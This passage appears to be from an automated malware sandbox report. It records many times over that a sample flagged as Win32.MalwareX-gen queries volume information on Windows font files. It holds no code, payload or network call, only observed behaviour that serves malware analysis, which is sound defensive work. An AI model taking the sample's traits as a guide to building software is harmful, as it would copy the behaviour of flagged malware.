          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
